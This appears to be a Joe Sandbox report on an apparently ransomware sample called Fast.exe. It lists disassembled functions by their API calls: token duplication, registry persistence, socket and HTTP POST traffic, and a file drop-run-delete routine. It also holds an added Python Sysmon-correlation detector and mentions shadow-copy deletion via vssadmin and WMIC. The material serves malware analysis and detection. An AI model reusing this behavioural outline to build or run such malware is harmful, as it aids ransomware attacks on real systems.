      Control-flow Graph (graph rendering not reproduced; nodes are marked Executed / Not Executed)
      APIs
        • Part of subcall function 000D3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,000D48E0,?), ref: 000D3D8C
        • Part of subcall function 000D3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 000D3DA1
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 000D4C1D
      • CreatePipe.KERNEL32(?,?,?,00000000), ref: 000D4C37
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 000D4C4D
      • SetHandleInformation.KERNEL32(?,00000001,00000000), ref: 000D4C5D
      • CreateProcessW.KERNEL32 ref: 000D4CB3
      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 000D4CD4
      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000D4CE0
      • CloseHandle.KERNEL32(?), ref: 000D4D07
      • CloseHandle.KERNEL32(?), ref: 000D4D13
      • CloseHandle.KERNEL32(?), ref: 000D4D22
      • CloseHandle.KERNEL32(?), ref: 000D4D2E
      • CloseHandle.KERNEL32(?), ref: 000D4D3A
      • CloseHandle.KERNEL32(?), ref: 000D4D46
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Create$InformationPipe$AddressFileModuleObjectProcProcessSingleWaitWrite
      • String ID: D
      • API String ID: 4141597255-2746444292
      • Opcode ID: f6deacf10b3427b9e7d696cfd3b697b7a7d061ac9b671455a5cc3b896b5bdd07
      • Instruction ID: f20a637533992beb2091948ddde8c615c964e3c8e49abadce9934b461a644a01
      • Opcode Fuzzy Hash: f6deacf10b3427b9e7d696cfd3b697b7a7d061ac9b671455a5cc3b896b5bdd07
      • Instruction Fuzzy Hash: 56514972509341AFD751EF61DC44D9BBBE9EF85760F00492FF59882261DB34CA08CBA2
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph (graph rendering not reproduced; nodes are marked Executed / Not Executed)
      APIs
      • GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 000D3F86
      • GetProcAddress.KERNEL32(00000000), ref: 000D3F8F
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3F98
      • GetProcAddress.KERNEL32(00000000), ref: 000D3F9B
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3FA4
      • GetProcAddress.KERNEL32(00000000), ref: 000D3FA7
      • GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3FB0
      • GetProcAddress.KERNEL32(00000000), ref: 000D3FB3
      • GetCurrentProcessId.KERNEL32 ref: 000D3FE6
      • OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 000D3FF3
      • ReadProcessMemory.KERNEL32(00000000,?,?,00000020,00000000), ref: 000D402C
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000030,00000000), ref: 000D4046
      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 000D407D
      • ReadProcessMemory.KERNEL32(000000FF,?,?,00000004,00000000), ref: 000D409A
      • ReadProcessMemory.KERNEL32(000000FF,?,?,?,00000000), ref: 000D40B6
      • CloseHandle.KERNEL32(000000FF), ref: 000D4104
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Process$HandleModule$AddressMemoryProcRead$CloseCurrentFileNameOpen
      • String ID:
      • API String ID: 754965762-0
      • Opcode ID: 1956b41051e142ba824791429b920631d0bfad33ad2df61e9efc09bb22c6d742
      • Instruction ID: b99fe3d8f5212d1bb1d260bd1d8de810d09084957dec64d9f8de365904331e83
      • Opcode Fuzzy Hash: 1956b41051e142ba824791429b920631d0bfad33ad2df61e9efc09bb22c6d742
      • Instruction Fuzzy Hash: C0712971D00209AFDF109BA4CC48EEEBFB8EF48314F144056FA15A2251D7799A85CFB1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph (graph rendering not reproduced; nodes are marked Executed / Not Executed)
      APIs
      • GetFileAttributesW.KERNEL32(?), ref: 000D87F3
      • GetFileAttributesW.KERNEL32(?), ref: 000D8816
      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 000D8835
      • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 000D885C
      • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000D888C
      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,?,00000000), ref: 000D88AD
      • WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 000D8938
      • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 000D8966
      • WriteFile.KERNEL32(00000002,00000000,?,?,00000000), ref: 000D8A62
      • FlushFileBuffers.KERNEL32(F0A75E12), ref: 000D8A95
      • FlushFileBuffers.KERNEL32(00000002), ref: 000D8A9A
        • Part of subcall function 000D86B7: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000002), ref: 000D86EA
        • Part of subcall function 000D86B7: SetFilePointerEx.KERNEL32(?,?,?,?,00000000), ref: 000D8713
        • Part of subcall function 000D86B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000D8737
        • Part of subcall function 000D86B7: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 000D8766
      • CloseHandle.KERNEL32(?), ref: 000D8AC2
      • CloseHandle.KERNEL32(000000FF), ref: 000D8ACD
      • DeleteFileW.KERNEL32(?), ref: 000D8AE3
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: File$PointerWrite$AttributesBuffersCloseCreateFlushHandle$DeleteRead
      • String ID:
      • API String ID: 668398616-0
      • Opcode ID: 81d5fa2f547a427e7f023d064a87264ddbf47300c20edf28057c65a2422b08a1
      • Instruction ID: 8185a885c6be12d15222c71b2a53b7978764b367fa7cc0f35625ba9168489a03
      • Opcode Fuzzy Hash: 81d5fa2f547a427e7f023d064a87264ddbf47300c20edf28057c65a2422b08a1
      • Instruction Fuzzy Hash: 6DB15171A00309AFEF11DFA4CC45BEEBBB9BF04310F148566F914E6291EB359A54CB61
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph (graph rendering not reproduced; nodes are marked Executed / Not Executed)
      APIs
      • htons.WS2_32(000001BD), ref: 000D5085
        • Part of subcall function 000D905B: GetProcessHeap.KERNEL32(00000008,00000000,000D92F9,00000001,00000002,00000000,00000000,000D3BCD,00000000,00000000,00000000,00000000,?,?,?,000D3C8D), ref: 000D906C
        • Part of subcall function 000D905B: HeapAlloc.KERNEL32(00000000,?,000D3C8D,00000017,00000000,00000000,?,?,?,000D28D8,00000000,00000000,00000000), ref: 000D9073
      • htonl.WS2_32(00000000), ref: 000D50DB
      • socket.WS2_32(00000002,00000001,00000006), ref: 000D50EC
      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 000D5102
      • connect.WS2_32(00000000,?,00000010), ref: 000D5113
      • WSAGetLastError.WS2_32 ref: 000D511D
      • getsockopt.WS2_32(?,0000FFFF,00001007,?,?), ref: 000D517C
      • recv.WS2_32(?,?,00000001,00000002), ref: 000D5195
      • WSAGetLastError.WS2_32 ref: 000D51A2
      • getpeername.WS2_32(?,?,?), ref: 000D51C9
      • closesocket.WS2_32(?), ref: 000D51E3
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ErrorHeapLast$AllocProcessclosesocketconnectgetpeernamegetsockopthtonlhtonsioctlsocketrecvsocket
      • String ID: w"
      • API String ID: 1659685214-2013044058
      • Opcode ID: c98d043cb8c4964ae24208a461406a895a36f649540b478dc0edb799f3068f91
      • Instruction ID: 1f79f1e6cc16049cba9c48606fe9863a97fd39cb85c8cf88c90cc981ac43c055
      • Opcode Fuzzy Hash: c98d043cb8c4964ae24208a461406a895a36f649540b478dc0edb799f3068f91
      • Instruction Fuzzy Hash: 8C514F75E01709AFEF219FA4DC85BEEBBB4EF05311F10012AEE00A6251D7755A45CBA1
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph (graph rendering not reproduced; nodes are marked Executed / Not Executed)
      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • GetVersion.KERNEL32(00000000,?,00000000), ref: 000D4A12
      • GetModuleHandleA.KERNEL32(?,00000001), ref: 000D4A71
      • GetProcAddress.KERNEL32(00000000), ref: 000D4A78
      • CloseHandle.KERNEL32(?), ref: 000D4B38
        • Part of subcall function 000D5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,000D5B3B,00000000,00000000,00000000,000D37EB,00000000), ref: 000D5B19
      • GetShellWindow.USER32 ref: 000D4AA3
      • GetWindowThreadProcessId.USER32(00000000,?), ref: 000D4AB2
      • OpenProcess.KERNEL32(00000400,00000000,?), ref: 000D4AC5
      • OpenProcessToken.ADVAPI32(00000000,02000000,000D2B94), ref: 000D4ADD
      • DuplicateTokenEx.ADVAPI32(000D2B94,02000000,?,00000002,00000001,?), ref: 000D4AFE
      • CloseHandle.KERNEL32(?), ref: 000D4B42
      • CloseHandle.KERNEL32(?), ref: 000D4B4C
      • CloseHandle.KERNEL32(000D2B94), ref: 000D4B56
      • CloseHandle.KERNEL32(?), ref: 000D4B60
        • Part of subcall function 000D3D4B: GetModuleHandleA.KERNEL32(00000000,?,00000000,00000000,000D48E0,?), ref: 000D3D8C
        • Part of subcall function 000D3D4B: GetProcAddress.KERNEL32(00000000,00000001), ref: 000D3DA1
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Handle$Close$Process$Module$AddressHeapOpenProcTokenWindow$AllocDuplicateFileNameShellThreadVersion
      • String ID:
      • API String ID: 4248481622-0
      • Opcode ID: bdca433c38abbd5b4a8e6381d91225eb7c556e5c927e7eb4ce01b4a4ba25d818
      • Instruction ID: ecd588b544679c0aa433c2ac8aa7139072c43d2cdb06b874dcd07053dbb375a7
      • Opcode Fuzzy Hash: bdca433c38abbd5b4a8e6381d91225eb7c556e5c927e7eb4ce01b4a4ba25d818
      • Instruction Fuzzy Hash: 15513771D01218AFEB11AFA0DC49AEEBFB9EF09721F100067F504B2250D7759A45CBB5
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph (graph rendering not reproduced; nodes are marked Executed / Not Executed)
      APIs
      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000), ref: 000D444F
      • OpenProcessToken.ADVAPI32(00000000), ref: 000D4456
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,}I,}I,00000000), ref: 000D4478
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 000D4492
      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 000D44B3
      • EqualSid.ADVAPI32(?,?), ref: 000D44D1
      • LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 000D450C
      • GetLastError.KERNEL32 ref: 000D4516
      • FreeSid.ADVAPI32(?), ref: 000D4533
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: ProcessToken$HeapInformation$AccountAllocAllocateCurrentEqualErrorFreeInitializeLastLookupOpen
      • String ID: }I
      • API String ID: 1407196647-4234324704
      • Opcode ID: d528a0f058271ffbd2a248d0de7c31f66254eb8b9fa8accef46e016abbc01acc
      • Instruction ID: 3e504a16501d441cce81c61b46f6069f56e9c17c00673d98f4499aeb285f5b50
      • Opcode Fuzzy Hash: d528a0f058271ffbd2a248d0de7c31f66254eb8b9fa8accef46e016abbc01acc
      • Instruction Fuzzy Hash: A831F872A01209BBEB51DF94EC88EEEBBBCFB08341F10406BE601E2151D7759E859B65
      Uniqueness

      Uniqueness Score: -1.00%

      Control-flow Graph (graph rendering not reproduced; nodes are marked Executed / Not Executed)
      APIs
      • WinHttpOpen.WINHTTP(000DA3C0,00000001,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 000D3CD3
      • WinHttpConnect.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 000D3CE7
      • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 000D3D08
      • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,00000000,00000000), ref: 000D3D21
      • WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 000D3D2D
      • WinHttpCloseHandle.WINHTTP(00000000,?,?,?,00000000,00000000,00000000), ref: 000D3D37
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 000D3D3C
      • WinHttpCloseHandle.WINHTTP(?,?,?,?,00000000,00000000,00000000), ref: 000D3D42
      Strings
      Memory Dump Source
      • Source File: 0000000E.00000002.1949813371.00000000000D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000D0000, based on PE: true
      • Associated: 0000000E.00000002.1949788479.00000000000D0000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949842777.00000000000DA000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949887950.00000000000DB000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949915746.00000000000DE000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 0000000E.00000002.1949940861.00000000000DF000.00000008.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_14_2_d0000_Fast.jbxd
      Yara matches
      Similarity
      • API ID: Http$CloseHandle$OpenRequest$ConnectReceiveResponseSend
      • String ID: POST$t.
      • API String ID: 4150888541-3436230425
      • Opcode ID: 826785941c26b38ba9ea6577ded8b7ac4109db16c4bceacbad2106a7102adad4
      • Instruction ID: 82f7a30bd13be081f2fd8e2893e57a0ad4fbf9a19201ace76c67f32ed52e725f
      • Opcode Fuzzy Hash: 826785941c26b38ba9ea6577ded8b7ac4109db16c4bceacbad2106a7102adad4
      • Instruction Fuzzy Hash: 6F11D235602228BBDB215F629C4CCDF7F7DEF477A0B104416F905A2210D6398A10DAB2
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 000D3C7A: GetVolumeInformationW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,000D28D8,00000000,00000000), ref: 000D3CA2
        • Part of subcall function 000D3A18: RegOpenKeyExW.ADVAPI32(00000002,00000000,00000000,00020119,00000000,00000000,00000000,80000002,00000000,00000002,?), ref: 000D3A44
        • Part of subcall function 000D3A18: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 000D3A60
        • Part of subcall function 000D3A18: RegCloseKey.ADVAPI32(?), ref: 000D3A79
      • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 000D463C
      • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,80000002,00000000,00000002,?), ref: 000D464E
      • GetProcAddress.KERNEL32(00000000), ref: 000D4655
      • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 000D46E1
      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,?,00000000), ref: 000D4737
      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 000D475F
      • WriteFile.KERNEL32(?,?,00000208,?,00000000,?,?,?,?,00000000), ref: 000D478B
      • FlushFileBuffers.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 000D47A3
      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,80000002,00000000), ref: 000D47AD
        • Part of subcall function 000D3EE1: GetModuleHandleA.KERNEL32(00000000,00000001,74DF35B0,00000208,00000000), ref: 000D3F86
        • Part of subcall function 000D3EE1: GetProcAddress.KERNEL32(00000000), ref: 000D3F8F
        • Part of subcall function 000D3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3F98
        • Part of subcall function 000D3EE1: GetProcAddress.KERNEL32(00000000), ref: 000D3F9B
        • Part of subcall function 000D3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3FA4
        • Part of subcall function 000D3EE1: GetProcAddress.KERNEL32(00000000), ref: 000D3FA7
        • Part of subcall function 000D3EE1: GetModuleHandleA.KERNEL32(00000000,?), ref: 000D3FB0
        • Part of subcall function 000D3EE1: GetProcAddress.KERNEL32(00000000), ref: 000D3FB3
        • Part of subcall function 000D3EE1: GetCurrentProcessId.KERNEL32 ref: 000D3FE6
        • Part of subcall function 000D3EE1: OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 000D3FF3
        • Part of subcall function 000D4325: CoInitializeEx.OLE32(00000000,00000006,?,74DF35B0,00000208,00000000,000D47D7,?,00000000,?), ref: 000D437F
        • Part of subcall function 000D4325: CoUninitialize.OLE32(?,?,?,?,?,?,74DF35B0,00000208,00000000,000D47D7), ref: 000D43B5
        • Part of subcall function 000D3E9E: ShellExecuteExW.SHELL32(?), ref: 000D3ED9
      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,00000000), ref: 000D47FA
      • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D4824
      Yara matches
      Similarity
      • API ID: Handle$AddressFileModuleProc$Process$CloseCurrentOpenWrite$BuffersCreateDeleteExecuteFlushInformationInitializeObjectQueryShellSingleUninitializeValueVersionVolumeWait
      • String ID:
      • API String ID: 3832649910-0
      • Opcode ID: 77f986429faa44a872acadcc7fbc5c84c6ef8813751a2b7dc3c6a427b50c67d2
      • Instruction ID: ded2d62e7144e9ae477e103218d1b9fceaf0fe6df10e981de97e376b50aec3df
      • Opcode Fuzzy Hash: 77f986429faa44a872acadcc7fbc5c84c6ef8813751a2b7dc3c6a427b50c67d2
      • Instruction Fuzzy Hash: 999162B2508341AFD710AF60DC85A9FBBE8EF84350F00092FF58592252EB75CA149B73
      Uniqueness

      Uniqueness Score: -1.00%
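The function above is a drop-run-delete: CreateFileW with GENERIC_WRITE (40000000) and CREATE_ALWAYS (2) creates a file, two WriteFile calls fill it (the second writes 0x208 bytes, the size of a MAX_PATH wide string), FlushFileBuffers and CloseHandle commit it, CoInitializeEx(COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE = 6) and ShellExecuteExW launch it, WaitForSingleObject waits on a handle (presumably the launched process) and DeleteFileW removes the file. The listing does not show the file's contents; the report's signatures for shadow-copy deletion via WMIC and vssadmin, bcdedit and netsh describe the kind of commands that are usually run through such a short-lived helper. The Python below is an added example, not code from the report or from Joe Sandbox: it correlates Sysmon-style FileCreate (Event 11), ProcessCreate (Event 1) and FileDelete (Event 23) records to surface files that one process wrote, had executed, and deleted again. Field names follow Sysmon; the events, GUIDs, the `helper.bat` path and the 120-second gap are constructed or assumed.

```python
from datetime import datetime, timedelta


def parse_time(s: str) -> datetime:
    # Sysmon UtcTime, e.g. "2024-01-25 10:00:00.123"
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def correlate_drop_run_delete(events, max_gap_s=120):
    """One finding per file that a process created (Event 11), that a new
    process was then started to run (Event 1 with the path on its command
    line), and that the creator deleted afterwards (Event 23). Events may
    arrive in any order; they are sorted by UtcTime first."""
    created, executed, findings = {}, {}, []
    for ev in sorted(events, key=lambda e: parse_time(e["UtcTime"])):
        t, eid = parse_time(ev["UtcTime"]), ev["EventID"]
        if eid == 11:
            created[(ev["ProcessGuid"], ev["TargetFilename"].lower())] = t
        elif eid == 1:
            cmd = ev["CommandLine"].lower()
            for (guid, path), t0 in created.items():
                if path in cmd and t - t0 <= timedelta(seconds=max_gap_s):
                    executed[(guid, path)] = {
                        "command": ev["CommandLine"],
                        # ShellExecuteEx usually spawns the interpreter as a
                        # direct child; keep this as evidence, not a requirement
                        "parent_is_creator": ev["ParentProcessGuid"] == guid,
                    }
        elif eid == 23:
            key = (ev["ProcessGuid"], ev["TargetFilename"].lower())
            if key in executed:
                findings.append({
                    "creator": ev["Image"],
                    "dropped": ev["TargetFilename"],
                    "lifetime_s": (t - created[key]).total_seconds(),
                    **executed[key],
                })
    return findings


# ---- constructed sample telemetry (not from the report) ----
BASE = datetime(2024, 1, 25, 10, 0, 0)
RANSOM = r"C:\Users\user\Desktop\Fast.exe"   # sample name from the report; path assumed
RANSOM_GUID = "{a1b2c3d4-0000-0000-0000-000000000001}"
SETUP_GUID = "{a1b2c3d4-0000-0000-0000-000000000002}"
DROP = r"C:\Users\user\AppData\Local\Temp\helper.bat"   # placeholder; the report shows no path
TMP = r"C:\Users\user\AppData\Local\Temp\state.tmp"


def _ts(ms: int) -> str:
    return (BASE + timedelta(milliseconds=ms)).strftime("%Y-%m-%d %H:%M:%S.%f")[:-3]


def build_sample_events():
    return [
        {"EventID": 11, "UtcTime": _ts(0), "ProcessGuid": RANSOM_GUID,
         "Image": RANSOM, "TargetFilename": DROP},
        {"EventID": 1, "UtcTime": _ts(300), "Image": r"C:\Windows\System32\cmd.exe",
         "CommandLine": f'cmd.exe /c "{DROP}"', "ParentProcessGuid": RANSOM_GUID,
         "ParentImage": RANSOM},
        {"EventID": 23, "UtcTime": _ts(2500), "ProcessGuid": RANSOM_GUID,
         "Image": RANSOM, "TargetFilename": DROP},
        # benign noise: an installer writes and removes a temp file that nothing executes
        {"EventID": 11, "UtcTime": _ts(100), "ProcessGuid": SETUP_GUID,
         "Image": r"C:\Temp\setup.exe", "TargetFilename": TMP},
        {"EventID": 23, "UtcTime": _ts(900), "ProcessGuid": SETUP_GUID,
         "Image": r"C:\Temp\setup.exe", "TargetFilename": TMP},
    ]


if __name__ == "__main__":
    for finding in correlate_drop_run_delete(build_sample_events()):
        print(finding)
```

Sysmon emits Event 23 only when FileDelete logging is enabled in its configuration, and the deleted file is archived only if that option is set; without it the correlation still works on Events 11 and 1 alone, but you lose the "deleted again" signal that separates a throwaway helper script from a normal installer.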

      APIs
        • Part of subcall function 000D9041: GetProcessHeap.KERNEL32(00000000,?,000D62B1,00000030,?,00000040,000D2A6F,000DB410), ref: 000D904D
        • Part of subcall function 000D9041: HeapAlloc.KERNEL32(00000000), ref: 000D9054
        • Part of subcall function 000D5B0E: GetModuleFileNameW.KERNEL32(00000000,?,00000104,000D5B3B,00000000,00000000,00000000,000D37EB,00000000), ref: 000D5B19
      • CopyFileW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 000D137E
      • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,?), ref: 000D13A9
      • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020106,?), ref: 000D13EF
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 000D1444
      • GetFileAttributesW.KERNEL32(00000000), ref: 000D144B
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 000D145B
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 000D14A8
      • CopyFileW.KERNEL32(?,00000000,00000001), ref: 000D14CB
      • GetFileAttributesW.KERNEL32(00000000), ref: 000D14D2
      • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 000D14E2
        • Part of subcall function 000D3A93: RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,000D1408,?,00000104,?,000D1408,00000000,00000000), ref: 000D3AA6
        • Part of subcall function 000D3A93: RegCloseKey.ADVAPI32(?,?,000D1408,00000000,00000000), ref: 000D3AB2
      Yara matches
      Similarity
      • API ID: File$AttributesCopy$HeapOpen$AllocCloseModuleNameProcessValue
      • String ID:
      • API String ID: 255945531-0
      • Opcode ID: b59d60305a13f1393579035edeed9136643b691c0fb8ed0316ce16e43ef27b7e
      • Instruction ID: 7989a056c55c08e45e64937fb87b2e2d47023701d338286434ab981706493b84
      • Opcode Fuzzy Hash: b59d60305a13f1393579035edeed9136643b691c0fb8ed0316ce16e43ef27b7e
      • Instruction Fuzzy Hash: 5C914171D00309BEEF116BA4EC46BEEBBB9EF45321F200017F505B5292DB759E509A71
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • InitializeCriticalSectionAndSpinCount.KERNEL32(000DD6A0,00000FA0,00000000,00000000,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D77F2
      • EnterCriticalSection.KERNEL32(000DD6A0,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D77F9
      • QueryPerformanceCounter.KERNEL32(000D17C2,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7809
      • GetTickCount.KERNEL32 ref: 000D780B
      • GetCurrentProcessId.KERNEL32(?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7829
      • GetCurrentThreadId.KERNEL32 ref: 000D7835
      • GetLocalTime.KERNEL32(?,?,000D78B7,00000000,00000000,00000000,?,000D17C2,?), ref: 000D7845
